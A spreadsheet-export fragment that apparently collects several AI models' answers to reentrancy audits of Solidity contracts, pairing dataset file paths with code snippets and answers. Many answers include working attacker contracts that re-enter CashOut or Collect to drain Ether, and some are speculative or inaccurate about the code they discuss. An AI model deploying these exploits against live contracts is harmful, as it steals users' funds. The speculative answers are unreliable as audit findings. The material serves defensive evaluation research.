    if (msg.value &gt; MinDeposit) {
        TransferLog.AddMessage(msg.sender, msg.value, ""Deposit"");
    }
    locked = false;
}
```
This will prevent the reentrancy attack while still allowing legitimate users to deposit funds."</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
The reentrancy vulnerability exists in the `CashOut` function. Specifically, the contract sends Ether to `msg.sender` before updating the `balances[msg.sender]` variable. A malicious contract can exploit this by calling `CashOut` recursively in its fallback function.
Example of a malicious contract that exploits this vulnerability:
```solidity
pragma solidity ^0.8.0;
interface VulnerableContract {
    function CashOut(uint _am) external payable;
}
contract MaliciousContract {
    VulnerableContract public victim;
    constructor(address _victim) {
        victim = VulnerableContract(_victim);
    }
    // Fallback function to exploit reentrancy
    fallback() external payable {
        if (address(victim).balance &gt;= msg.value) {
            victim.CashOut(msg.value);
        }
    }
    // Initial function to start the attack
    function attack(uint _am) external {
        victim.CashOut(_am);
    }
}
```
3. The business impact of these vulnerabilities in one sentence:
The `CashOut` function leads to unauthorized withdrawal of funds from the contract.
4. The potential solutions of these vulnerabilities:
- Use the "Checks-Effects-Interactions" pattern: First, perform all the checks (e.g., balance check), then make any changes to the contract's state, and finally, interact with other contracts.
- Use `transfer` or `send` instead of `call.value` for safer, limited-gas transfers.
Here is how the `CashOut` function could be rewritten to avoid the vulnerability:
```solidity
function CashOut(uint _am) public payable {
    require(_am &lt;= balances[msg.sender], "Insufficient balance");
    // Update balance first (Effect)
    balances[msg.sender] -= _am;
    // Log the transfer (Effect)
    TransferLog.AddMessage(msg.sender, _am, "CashOut");
    // Send the Ether (Interaction)
    (bool success, ) = msg.sender.call{value: _am}("");
    require(success, "Transfer failed");
}
```</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function Collect(uint _am)
    public
    payable
    {
        var acc = Acc[msg.sender];
        if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
        {
            if(msg.sender.call.value(_am)())
            {
                acc.balance-=_am;
                LogFile.AddMessage(msg.sender,_am,"Collect");
            }
        }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
    - **Use of Deprecated `var` Keyword**: The code uses the `var` keyword for variable type inference, which has been deprecated.
    - **Use of `now` for Timestamps**: The code uses the `now` keyword, which is an alias for `block.timestamp` and can be manipulated by miners to a certain extent.
    - **Uninitialized Struct**: The code accesses `Acc[msg.sender]` but it's not clear if `Acc` or `msg.sender` has been initialized properly. This can lead to unexpected behavior.
    - **Re-entrancy Vulnerability**: In the `Collect` function, `acc.balance` is not updated before the external call, making the contract vulnerable to re-entrancy attacks.
3. The business impact of these vulnerabilities in one sentence:
    - Deprecated `var` and `now` keywords lead to potential code misbehavior.
    - Uninitialized struct can lead to unexpected and possibly exploitative behavior.
    - Re-entrancy vulnerability can lead to funds being drained from the contract.
4. The potential solutions of these vulnerabilities:
    - **Use of Deprecated `var` Keyword**: Use explicit type declarations for variables.
    - **Use of `now` for Timestamps**: Use an alternative, more secure method for time-locking mechanisms.
    - **Uninitialized Struct**: Ensure all structs are properly initialized before use.
    - **Re-entrancy Vulnerability**: Update `acc.balance` before making external calls and consider using the Checks-Effects-Interactions pattern.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes.
2. how this vulnerability can be exploited :
- **Reentrancy Vulnerability**: The function uses `msg.sender.call.value(_am)()` to send Ether. This allows the recipient to perform arbitrary operations, including calling back into the contract in a reentrant manner before `acc.balance-=_am;` is executed, potentially draining the contract funds.
  **Example Attack**:
  ```solidity
  contract Attacker {
    Collect target;
    constructor(Collect _target) {
      target = _target;
    }
    function attack() public payable {
      target.Collect(1 ether);
    }
    fallback() external payable {
      if (address(target).balance &gt;= 1 ether) {
        target.Collect(1 ether);
      }
    }
  }
  ```
- **Type Vulnerability**: The code uses the outdated `var` syntax for variable declaration (`var acc = Acc[msg.sender];`). This can lead to unintended types being assigned.
- **Underflow Vulnerability**: The line `acc.balance-=_am;` could potentially underflow if `_am` is greater than `acc.balance`, although the function checks for this condition. However, if reentr</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The smart contract has a reentrancy vulnerability in the `Collect` function. The function allows the withdrawal of Ether (`_am`) from a user's account (`Acc[msg.sender]`). The function checks whether the account has enough balance (`acc.balance &gt;= _am`) and whether the unlock time has passed (`now &gt; acc.unlockTime`). However, the critical issue here is that it sends Ether to the caller (`msg.sender.transfer(_am)`) before updating the account balance (`acc.balance -= _am`).
Here is the part of the code that has the vulnerability:
```solidity
if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
{
    if(msg.sender.call.value(_am)())
    {
        LogFile.AddMessage(msg.sender,_am,"Collect");
    }
    acc.balance-=_am;
}
```
This pattern is susceptible to a reentrancy attack, where the attacker can call back into the `Collect` function before the state `acc.balance` is updated, allowing for multiple withdrawals.
### Steps to Exploit:
1. The attacker deploys a malicious contract that has a fallback function calling back into the `Collect` function of the vulnerable contract.
2. The attacker calls the `Collect` function of the vulnerable contract.
3. The vulnerable contract sends Ether to the malicious contract.
4. The fallback</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The code has a reentrancy vulnerability because it calls an external contract (`msg.sender.call.value(_am)()`) before updating the state (`acc.balance-=_am;`). This allows the external contract to re-enter the `Collect` function before the state is updated, potentially draining more funds than intended.
Here's a simple example of how an attacker could exploit this:
```solidity
contract ReentrantAttacker {
    // The target contract
    TargetContract public target;
    constructor(address _targetAddress) {
        target = TargetContract(_targetAddress);
    }
    // Initial call to start the attack
    function startAttack(uint _am) public {
        target.Collect(_am);
    }
    // Fallback function to exploit reentrancy
    fallback() external payable {
        if (address(target).balance &gt;= msg.value) {
            target.Collect(msg.value);
        }
    }
}
```
In this example, the `ReentrantAttacker` contract first calls the `Collect` function on the target contract. When the target contract tries to transfer the ether using `msg.sender.call.value(_am)()`, it calls back into the `ReentrantAttacker`'s fallback function, which again calls `Collect` before the state variable `acc.balance` is updated. This can be repeated as many times as the contract's gas limit allows, potentially draining more funds than intended.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function CashOut(uint _am)
    public
    payable
    {
        if(_am&lt;=balances[msg.sender]&amp;&amp;block.number&gt;lastBlock)
        {
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                TransferLog.AddMessage(msg.sender,_am,"CashOut");
            }
        }
    }
    </t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
### Vulnerabilities and Proof of Concept:
1. **Old Compiler Version**: The contract uses an old version of the Solidity compiler (`0.4.19`). This can expose the contract to vulnerabilities that have been fixed in later versions.
2. **Reentrancy Vulnerability**: The contract does not properly handle reentrancy attacks, especially in methods where ETH is transferred. For instance, in the `Withdraw` function (not shown in the snippet, but assuming it exists and follows common patterns), an attacker could exploit this if the function sends ETH before updating the user balance.
3. **Lack of Access Control**: There is no mention of who can change the `MinDeposit` value or call other potentially sensitive functions. Anyone could set this to an arbitrary value unless properly restricted.
4. **Unknown External Contract Interaction**: The contract interacts with an external contract `Log` via the `TransferLog` variable. This external contract's behavior is unknown and could potentially be malicious.
5. **Uninitialized Storage**: The `lastBlock` variable is declared but never initialized or used, which could lead to bugs in future developments.
6. **Unclear Intent**: Variables and functions are not well-commented, making it difficult to understand the intent of the contract.
Note: I only had access to a portion of the code. There might be other vulnerabilities in the sections not visible.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
- **Reentrancy Attack**: The function is vulnerable to a reentrancy attack. The issue is that the contract's state (`balances[msg.sender]`) is updated after the external call (`msg.sender.call.value(_am)()`), which can be manipulated to re-enter the function and withdraw more funds than allowed.
  To demonstrate a reentrancy attack, an attacker can create a malicious contract that overrides its fallback function. When the `CashOut` function sends Ether to the malicious contract, the fallback function will be invoked, which can then call `CashOut` again before the `balances[msg.sender]` is updated. Here's a simplified example:
  ```solidity
  // Malicious contract to exploit reentrancy
  contract Attack {
      CashOutContract public victim;
      constructor(CashOutContract _victim) {
          victim = _victim;
      }
      // Fallback function that gets called when receiving Ether
      function () payable external {
          if (address(victim).balance &gt;= msg.value) {
              victim.CashOut(msg.value);
          }
      }
      // Initial function to start the attack
      function startAttack(uint _am) public {
          victim.CashOut(_am);
      }
  }
  ```
  The attacker first calls `startAttack` with an amount `_am` that they are legitimately allowed to cash out. The `CashOut` function of the victim contract sends the Ether, invoking the fallback function in the attacker's contract, which again calls `CashOut`. This can be repeated as many times as the attacker wishes, draining the contract of more Ether than they should have been able to withdraw.
- **Lack of Proper Checks**: The function does not include proper checks such as `require` statements to revert the transaction if the conditions are not met, which is not a direct vulnerability but is considered bad practice.
- **Gas Limit Issues**: Using a low-level `.call` method can lead to out-of-gas errors if not handled properly. This is not a direct vulnerability in this context, but it's worth mentioning as a potential issue.
- **Event Logging**: While not a security vulnerability, the usage of `TransferLog.AddMessage` indicates that there is some form of event logging. However, it would be better to use Solidity's native `event` for such logging, which is a more standard and gas-efficient way.
- **Block Number Check**: The function checks `block.number &gt; lastBlock` but never updates `lastBlock`. This may be intended, but without the full context, it could be a logic error.</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The contract `ETH_FUND` has a reentrancy vulnerability in its `WithdrawFunds` function (not shown in the truncated code snippet, but assumed to be in the full contract).
In Solidity, reentrancy vulnerabilities typically occur when external contracts are called before internal state is updated. In the `WithdrawFunds` function, the contract likely sends Ether to an address before reducing the balance of that address in the internal `balances` mapping. This allows the external contract to call `WithdrawFunds` recursively, draining more funds than it should be able to.
The vulnerability would look something like this:
```solidity
function WithdrawFunds(uint _amount)
    public
{
    require(balances[msg.sender] &gt;= _amount);
    // Vulnerable line: external call before state update
    msg.sender.transfer(_amount);  
    balances[msg.sender] -= _amount;
}
```
An attacker could exploit this by implementing a fallback function in their contract that calls `WithdrawFunds` again before the `balances` mapping is updated.
```solidity
contract Attacker {
    ETH_FUND public victim;
    constructor(address _victim) public {
        victim = ETH_FUND(_victim);
    }
    function attack() public payable {
        victim.Deposit.value(msg.value)();
        victim.WithdrawFunds(msg.value);
    }
    function () external payable {
        if (address(victim).balance &gt;= msg.value) {
            victim.WithdrawFunds(msg.value);
        }
    }
}
```
In this example, the `Attacker` contract's fallback function will be triggered by the `msg.sender.transfer(_amount);` line in `WithdrawFunds`. This will result in a recursive call to `WithdrawFunds`, draining more Ether from the contract than the attacker is entitled to.</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The code snippet provided appears to be a Solidity function designed for a smart contract on the Ethereum blockchain. The function, `CashOut`, has a reentrancy vulnerability.
The problem lies in the order of operations:
1. `msg.sender.call.value(_am)()` is called to send `_am` amount of Ether to the address `msg.sender`.
2. The balance `balances[msg.sender]` is updated only after the funds have been sent.
An attacker can exploit this by recursively calling the `CashOut` function before `balances[msg.sender]` is updated. This allows the attacker to drain more funds than they should be able to, based on their balance.
Here's a simple attack contract that demonstrates this vulnerability:
```solidity
pragma solidity ^0.4.24;
interface VulnerableContract {
    function CashOut(uint _am) external payable;
}
contract Attacker {
    VulnerableContract public vulnerableContract;
    address public owner;
    constructor(address _vulnerableContractAddress) public {
        vulnerableContract = VulnerableContract(_vulnerableContractAddress);
        owner = msg.sender;
    }
    function attack(uint _am) public {
        require(msg.sender == owner, "Only the owner can initiate the attack");
        vulnerableContract.CashOut(_am);
    }
    function () external payable {
        if (address(vulnerableContract).balance &gt;= msg.value) {
            vulnerableContract.CashOut(msg.value);
        }
    }
}
```
In this example, the `Attacker` contract has a fallback function that gets triggered when Ether is sent to it. This function calls `CashOut` recursively, exploiting the reentrancy vulnerability to drain more Ether from the vulnerable contract than should be possible based on the attacker's balance.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function Collect(uint _am)
    public
    payable
    {
        var acc = Acc[msg.sender];
        if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
        {
            if(msg.sender.call.value(_am)())
            {
                acc.balance-=_am;
                Log.AddMessage(msg.sender,_am,"Collect");
            }
        }
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
   Yes
2. how this vulnerability can be exploited :
   - **Usage of Deprecated Features**: The contract uses `throw` for error handling which is a deprecated feature. Modern Solidity recommends using `revert()`, `require()`, or `assert()` for better error handling.
   - **Uninitialized Storage Pointer**: The `LogFile Log;` variable is declared but not initialized, leading to potential risks if accessed before being set.
   - **Missing Access Control**: Functions like `SetMinSum()` and `SetLogFile()` are public and do not have any access control mechanisms like `onlyOwner`. Anyone can call these functions and change the contract settings.
   - **Missing Constructor**: The contract lacks a constructor to initialize variables like `MinSum` and `Log`, leading to potential vulnerabilities.
   - **Integer Overflow/Underflow**: The contract does not use SafeMath or similar libraries to prevent integer overflows or underflows.
   - **Lack of Events**: The contract does not emit events for important state changes, making it difficult to track actions on the blockchain.
Please note that this is a partial analysis; a full audit would require analyzing the entire smart contract code.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities.
2. Proof of Concept of these vulnerabilities:
  - **Reentrancy Attack**: The contract's `Collect` function is vulnerable to a reentrancy attack because it calls an external contract (`msg.sender.call.value(_am)()`) before updating the state (`acc.balance-=_am;`). An attacker can recursively call the `Collect` function before the state is updated, effectively draining the contract's Ether.
  - **Deprecated `var` keyword**: The `var` keyword is deprecated and should be replaced with a specific type like `uint` or `address`.
  - **Lack of Event Emission**: While not necessarily a security vulnerability, it's generally good practice to emit events for significant state changes. The `Log.AddMessage` seems like an internal mechanism for logging, which might not be as effective and transparent as using Solidity's `emit` for events.
  - **Uninitialized Storage Pointer**: The code uses `var acc = Acc[msg.sender];`, which suggests that `acc` is a storage pointer. If `Acc` is a mapping and `acc` is not properly initialized, this could lead to unexpected behavior.
  - **Use of `now`**: The code uses the `now` keyword, which is an alias for `block.timestamp`. This is not a security vulnerability per se, but it's important to be aware that miners can manipulate this value to some extent.
Here is an example that demonstrates the reentrancy attack vulnerability:
```solidity
// Attacker Contract
contract Attacker {
    YourVulnerableContract target;
    constructor(address _target) {
        target = YourVulnerableContract(_target);
    }
    function attack(uint _am) public {
        // Initial call to start the attack
        target.Collect(_am);
    }
    // Fallback function to perform reentrant calls
    fallback() external payable {
        if (address(target).balance &gt;= 1 ether) {
            target.Collect(1 ether);
        }
    }
}
```
In this example, the `Attacker` contract calls `Collect` on the target contract. The target contract then sends Ether back to the `Attacker`, which triggers the `fallback` function. The `fallback` function then calls `Collect` again before the target contract has a chance to update its state, allowing the attacker to drain more Ether than they should be able to.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? Not sure
The provided code is only a partial snippet of the full smart contract. To fully analyze the contract for reentrancy vulnerabilities, I would need to see the complete implementation, particularly the functions that handle Ether transactions. Would you like to provide the complete smart contract code for a comprehensive analysis?</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The code contains a reentrancy vulnerability because it performs an external call using `msg.sender.call.value(_am)()` before updating the state variable `acc.balance`. This allows the external contract to re-enter the `Collect` function before `acc.balance` is updated, potentially leading to the draining of funds.
Here is a simple proof-of-concept malicious contract that exploits this vulnerability:
```solidity
pragma solidity ^0.4.24;
interface VulnerableContract {
    function Collect(uint _am) external payable;
}
contract MaliciousContract {
    VulnerableContract public vulnerableContract;
    uint public amountToSteal;
    constructor(address _vulnerableContract, uint _amountToSteal) public {
        vulnerableContract = VulnerableContract(_vulnerableContract);
        amountToSteal = _amountToSteal;
    }
    function attack() public payable {
        vulnerableContract.Collect(amountToSteal);
    }
    // This fallback function will be called during the execution of vulnerableContract.Collect()
    function() public payable {
        if (address(vulnerableContract).balance &gt; 0) {
            vulnerableContract.Collect(amountToSteal);
        }
    }
}
```
In this example, the `MaliciousContract` calls the `Collect` function of the vulnerable contract. When the `msg.sender.call.value(_am)()` is executed, it triggers the fallback function of `MaliciousContract`, which in turn calls `Collect` again, leading to reentrancy. Since `acc.balance` is not updated before the external call, `MaliciousContract` can drain funds from the vulnerable contract.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
- **Use of Deprecated Language Features**: The contract uses deprecated language features like `throw;` which have been replaced in newer versions of Solidity. This is not a security vulnerability per se, but it's an outdated practice.
- **Reentrancy Vulnerability**: The function `Collect(uint _am)` is vulnerable to a reentrancy attack because it uses `msg.sender.call.value(_am)()` before updating the user's balance. An attacker can recursively call the `Collect` function to drain the contract.
- **Ownership and Authorization Not Enforced**: Functions like `SetMinSum(uint _val)` and `SetLogFile(address _log)` have no ownership or authorization checks. This means anyone can call these functions, which can compromise the integrity of the contract.
- **Initialization Not Checked**: The contract has an `intitalized` boolean that seems intended to prevent certain operations before initialization is complete. However, the contract does not check whether it's initialized or not before performing important operations like `Deposit` and `Collect`.
- **Failure to Log Errors**: The contract relies on an external contract (`LogFile`) for logging, but there's no check to ensure that the logging is successful. If the logging fails, the contract has no way of knowing.
- **Use of Low-Level Calls**: The contract uses low-level `.call()` function, which is generally considered risky and should be avoided if possible. 
- **Uninitialized Storage Variable**: The `LogFile Log;` variable is uninitialized and can point to a malicious contract if `SetLogFile` is called by an attacker, leading to unexpected behavior.
- **Spelling and Syntax Mistakes**: While not a security vulnerability, the contract contains spelling mistakes like `intitalized` instead of `initialized`, which can lead to misunderstandings and potential issues during maintenance or audits.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
- **Reentrancy Vulnerability**: The function is susceptible to a reentrancy attack because it calls an external contract (`msg.sender.call.value(_am)()`) before updating its internal state (`balances[msg.sender]-=_am;`). An attacker could create a malicious contract that, when called by `msg.sender.call.value(_am)()`, re-enters the `Collect` function to drain more funds than they should be able to.
- **Gas Limit Issues**: Using `.call.value(_am)()` without specifying a gas limit could be risky. While this is generally considered safer than using `.send()` or `.transfer()` for avoiding stuck funds, it opens up the potential for a gas-costly fallback function to be executed, which could exceed block gas limits.
Here's a simplified example to demonstrate the reentrancy vulnerability:
```solidity
// Attacker's contract
contract Attacker {
    CollectTarget public target;
    uint public amount = 1 ether; // Assuming the attacker has 1 ether in the target contract
    constructor(CollectTarget _target) public {
        target = _target;
    }
    function attack() public payable {
        require(target.Collect(amount));
    }
    fallback() external payable {
        if (address(target).balance &gt;= amount) {
            require(target.Collect(amount));
        }
    }
}
```
In this example, when the `Collect` function of the target contract is called, it triggers the fallback function of the `Attacker` contract, which in turn calls `Collect` again. This cycle could continue until the target contract is drained of its funds.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
- Yes
2. how this vulnerability can be exploited :
The contract `DEP_BANK` is vulnerable to reentrancy attacks due to its `GetMyBalance` and `CashOut` functions. Below are the functions where the vulnerability exists:
```solidity
function GetMyBalance()
public
returns(uint256)
{
    return balances[msg.sender];
}
function CashOut(uint _am)
public
{
    if(_am&lt;=0)throw;
    if(balances[msg.sender]&lt;_am)throw;
    if(msg.sender.call.value(_am)())
    {
        balances[msg.sender]-=_am;
        Log.AddMessage(msg.sender,_am,"CashOut");
    }
}
```
### Explanation:
- In the `CashOut` function, the contract sends the Ether before updating the `balances` mapping. This allows an attacker to re-enter the contract before the state (`balances`) is updated.
- The function uses `msg.sender.call.value(_am)()`, which allows for reentrancy since the external address can perform arbitrary actions.
### Attack Scenario:
1. An attacker deploys a contract that calls `DEP_BANK.CashOut`.
2. The attacker's contract has a fallback function that calls `DEP_BANK.CashOut` again.
3. Since the `balances` mapping is updated after the Ether is sent, the attacker can drain more Ether than they have in `balances`.
Here's a sample malicious contract that can exploit this vulnerability:
```solidity
pragma solidity ^0.4.19;
contract Attack {
    DEP_BANK public depBank;
    function Attack(address _depBankAddress) public {
        depBank = DEP_BANK(_depBankAddress);
    }
    function deposit(uint amount) public payable {
        depBank.Deposit.value(amount)();
    }
    function attack(uint amount) public {
        depBank.CashOut(amount);
    }
    function () public payable {
        if (address(depBank).balance &gt;= msg.value) {
            depBank.CashOut(msg.value);
        }
    }
}
```
In this sample, the `attack` function initiates the exploit, and the fallback function keeps calling `CashOut` as long as there's enough Ether in the `DEP_BANK` contract.</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of Vulnerabilities:
The code has a reentrancy vulnerability because it uses the `call.value()` function before updating the `balances` mapping. This opens up the possibility for a malicious contract to re-enter the `Collect` function before `balances[msg.sender] -= _am;` is executed, potentially draining more Ether than allowed by the user's balance.
Here is a simple example of a malicious contract that could exploit this vulnerability:
```solidity
// Malicious contract
pragma solidity ^0.8.0;
contract Attack {
    address public target;
    constructor(address _target) {
        target = _target;
    }
    // Fallback function to receive Ether
    fallback() external payable {
        if (address(target).balance &gt;= msg.value) {
            // Re-enter the Collect function
            (bool success, ) = target.call(abi.encodeWithSignature("Collect(uint256)", msg.value));
            require(success, "Attack failed");
        }
    }
    // Initial function to start the attack
    function startAttack(uint _am) public {
        (bool success, ) = target.call(abi.encodeWithSignature("Collect(uint256)", _am));
        require(success, "Initial attack failed");
    }
}
```
In this example, the `Attack` contract calls the `Collect` function of the target contract. If successful, the target contract then sends Ether back to the `Attack` contract, triggering its fallback function. The fallback function then immediately calls `Collect` again, leading to reentrancy.
The reentrancy will continue as long as `address(target).balance &gt;= msg.value`, potentially draining more Ether from the target contract than the attacker is supposed to be able to based on their balance in `balances[msg.sender]`.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?  
Yes
2. how this vulnerability can be exploited :
### Identified Vulnerabilities:
1. **Outdated Solidity Version**: The contract uses an outdated version of Solidity (`^0.4.19`). This could expose the contract to vulnerabilities fixed in later versions.
2. **Re-Entrancy Vulnerability**: The contract does not properly protect against re-entrancy attacks, particularly in methods where funds are transferred.
3. **No Ownership or Access Control**: The contract does not have any ownership or access control mechanisms. This means that any address can potentially interact with the contract's functions in unintended ways.
4. **Lack of Events for Important Actions**: It's not clear from the snippet if there are events to log important actions, which is essential for transparency and debugging.
5. **Fallback Function**: From the snippet, it's unclear whether a fallback function exists and if it does, whether it is properly implemented.
6. **Immutable State Variables**: The `MinDeposit` variable is public but not immutable, which means that it could potentially be changed in the future if a function allows for that, leading to unexpected behavior.
### Proof of Concept:
1. **Outdated Solidity Version**: Upgrade to a more recent, audited version of Solidity.
2. **Re-Entrancy Vulnerability**: 
    - Use the Checks-Effects-Interactions pattern.
    - Or, use a re-entrancy guard.
3. **No Ownership or Access Control**: 
    - Implement ownership and roles for executing specific functions.
4. **Lack of Events**: 
    - Declare and emit events for state-changing functions.
5. **Fallback Function**: 
    - Implement a secure fallback function if required.
6. **Immutable State Variables**: 
    - Make `MinDeposit` an immutable variable if it's not supposed to be changed.
Note: This analysis is based on a partial snippet of the code. A complete analysis would require the full codebase.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes.
2. how this vulnerability can be exploited :
#### Reentrancy Attack
The code is vulnerable to a reentrancy attack. The issue lies in the `msg.sender.call.value(_am)()` line where an external call is made before updating the `balances` mapping. An attacker could take advantage of this by re-entering the `CashOut` function before `balances[msg.sender] -= _am;` is executed.
Here's a simple smart contract that could exploit this vulnerability:
```solidity
pragma solidity ^0.8.0;
contract Exploit {
    address public target;
    constructor(address _target) {
        target = _target;
    }
    // Fallback function to exploit reentrancy
    fallback() external payable {
        if (address(target).balance &gt;= msg.value) {
            (bool success, ) = target.call(abi.encodeWithSignature("CashOut(uint256)", msg.value));
            require(success, "Call failed");
        }
    }
    // Initial function to trigger the exploit
    function startExploit(uint _amount) public {
        (bool success, ) = target.call(abi.encodeWithSignature("CashOut(uint256)", _amount));
        require(success, "Initial call failed");
    }
}
```
In the above example, when `startExploit()` is called, it triggers the `CashOut()` function on the target contract. The `msg.sender.call.value(_am)()` line in the target contract then calls the `fallback` function of the `Exploit` contract, which in turn calls `CashOut()` again before the `balances` mapping is updated. This allows the attacker to drain more funds than they should be able to.
#### Log Manipulation
Another minor issue is that the `TransferLog.AddMessage(msg.sender, _am, "CashOut");` is logged even if the `msg.sender.call.value(_am)()` fails. This could lead to misleading logs, but it's less critical compared to the reentrancy attack.
To fix these issues, the `balances[msg.sender] -= _am;` should be updated before making the external call, and you can also use the Checks-Effects-Interactions pattern to mitigate reentrancy attacks.</t>
  </si>
  <si>
    <t>Based on the initial fragment of the Solidity code, I can't provide a complete analysis yet. Would you like me to display more of the code, or shall we proceed with the analysis based on this fragment?</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The code for the `CashOut` function has a reentrancy vulnerability. Specifically, the state variable `balances[msg.sender]` is updated only after the call to `msg.sender.call.value(_am)()`. This means that a malicious contract can call `CashOut` again before `balances[msg.sender]` is updated, leading to a reentrancy attack.
Here's a simple malicious contract that exploits this vulnerability:
```solidity
pragma solidity ^0.8.0;
contract Malicious {
    // Reference to the vulnerable contract
    VulnerableContract public vulnerableContract;
    constructor(address _vulnerableContract) {
        vulnerableContract = VulnerableContract(_vulnerableContract);
    }
    // Fallback function to receive Ether
    fallback() external payable {
        if (address(vulnerableContract).balance &gt;= msg.value) {
            vulnerableContract.CashOut(msg.value);
        }
    }
    // Initial function to trigger the attack
    function attack(uint _am) public {
        vulnerableContract.CashOut(_am);
    }
}
```
In this example, the `fallback` function of the `Malicious` contract calls `CashOut` again before `balances[msg.sender]` is updated in the `VulnerableContract`. This could lead to multiple withdrawals of the same balance, effectively draining the contract.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function CashOut(uint _am)
    {
        if(_am&lt;=balances[msg.sender])
        {          
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                TransferLog.AddMessage(msg.sender,_am,"CashOut");
            }
        }
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
### Vulnerabilities and Proof of Concept
#### 1. Use of Outdated Solidity Version
The contract is written in Solidity version `0.4.19`, which is outdated and may not have the security improvements and optimizations present in newer versions. 
  - **Proof of Concept**: Update to a newer version of Solidity.
#### 2. No Access Control
The contract lacks any form of access control for certain functions, including the constructor, making it vulnerable to unauthorized access.
  - **Proof of Concept**: Implement access controls such as `onlyOwner` modifier.
#### 3. Lack of Events
The contract is using a custom `Log` contract for logging events, but it's unclear how this `Log` contract functions. This may cause difficulties in tracking transactions or even open up security issues.
  - **Proof of Concept**: Use Solidity's native `event` functionality for logging.
#### 4. Unchecked Arithmetic Operations
The contract uses unchecked arithmetic operations (`balances[msg.sender] += msg.value`). This can lead to integer overflow or underflow.
  - **Proof of Concept**: Use SafeMath library or Solidity 0.8.x's in-built overflow/underflow checks.
#### 5. Constructor Function
The contract is using the old constructor syntax, which can lead to bugs and vulnerabilities if not properly instantiated.
  - **Proof of Concept**: Use the `constructor` keyword for defining constructors.
#### 6. Reentrancy Vulnerability
The `Withdraw` function (not fully shown but can be assumed) could be susceptible to reentrancy attacks if not implemented carefully.
  - **Proof of Concept**: Implement checks-effects-interactions pattern or use a reentrancy guard.
Note: The code snippet is incomplete, so there could be additional vulnerabilities not captured in this analysis.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
The code snippet appears to be a Solidity function for a smart contract in Ethereum. The function aims to allow users to cash out their balance. It contains a critical vulnerability known as "Reentrancy Attack".
### Reentrancy Attack:
The function uses the `msg.sender.call.value(_am)()` to send Ether to the address that initiated the function call (`msg.sender`). This is risky because the `.call()` method is low-level and can execute arbitrary code. If `msg.sender` is a malicious smart contract, it could re-enter the `CashOut` function before the `balances[msg.sender]-=_am;` line is executed. This would allow the attacker to drain more Ether than they should be allowed to, based on their balance.
Here's how it works:
1. A malicious contract calls `CashOut` with `_am` set to their balance.
2. `msg.sender.call.value(_am)()` transfers `_am` Ether to the malicious contract.
3. The malicious contract's fallback function is invoked.
4. Inside the fallback function, the malicious contract calls `CashOut` again before the first call has a chance to update `balances[msg.sender]`.
5. Steps 2-4 repeat, draining the contract of Ether.
### Example Malicious Contract:
```solidity
pragma solidity ^0.4.17;
interface VulnerableContract {
    function CashOut(uint _am) external;
}
contract Attack {
    VulnerableContract public vulnerableContract;
    address public owner;
    constructor(address _vulnerableContract) {
        vulnerableContract = VulnerableContract(_vulnerableContract);
        owner = msg.sender;
    }
    function attack(uint _am) public {
        vulnerableContract.CashOut(_am);
    }
    // This fallback function gets called when the contract receives Ether
    function () external payable {
        if (address(vulnerableContract).balance &gt;= msg.value) {
            vulnerableContract.CashOut(msg.value);
        }
    }
    function collectEther() public {
        require(msg.sender == owner);
        owner.transfer(address(this).balance);
    }
}
```
To mitigate this issue, you should follow the Checks-Effects-Interactions pattern in Solidity, which advises to first perform all checks, then make all changes, and lastly, interact with other contracts.</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
### Reentrancy Vulnerability
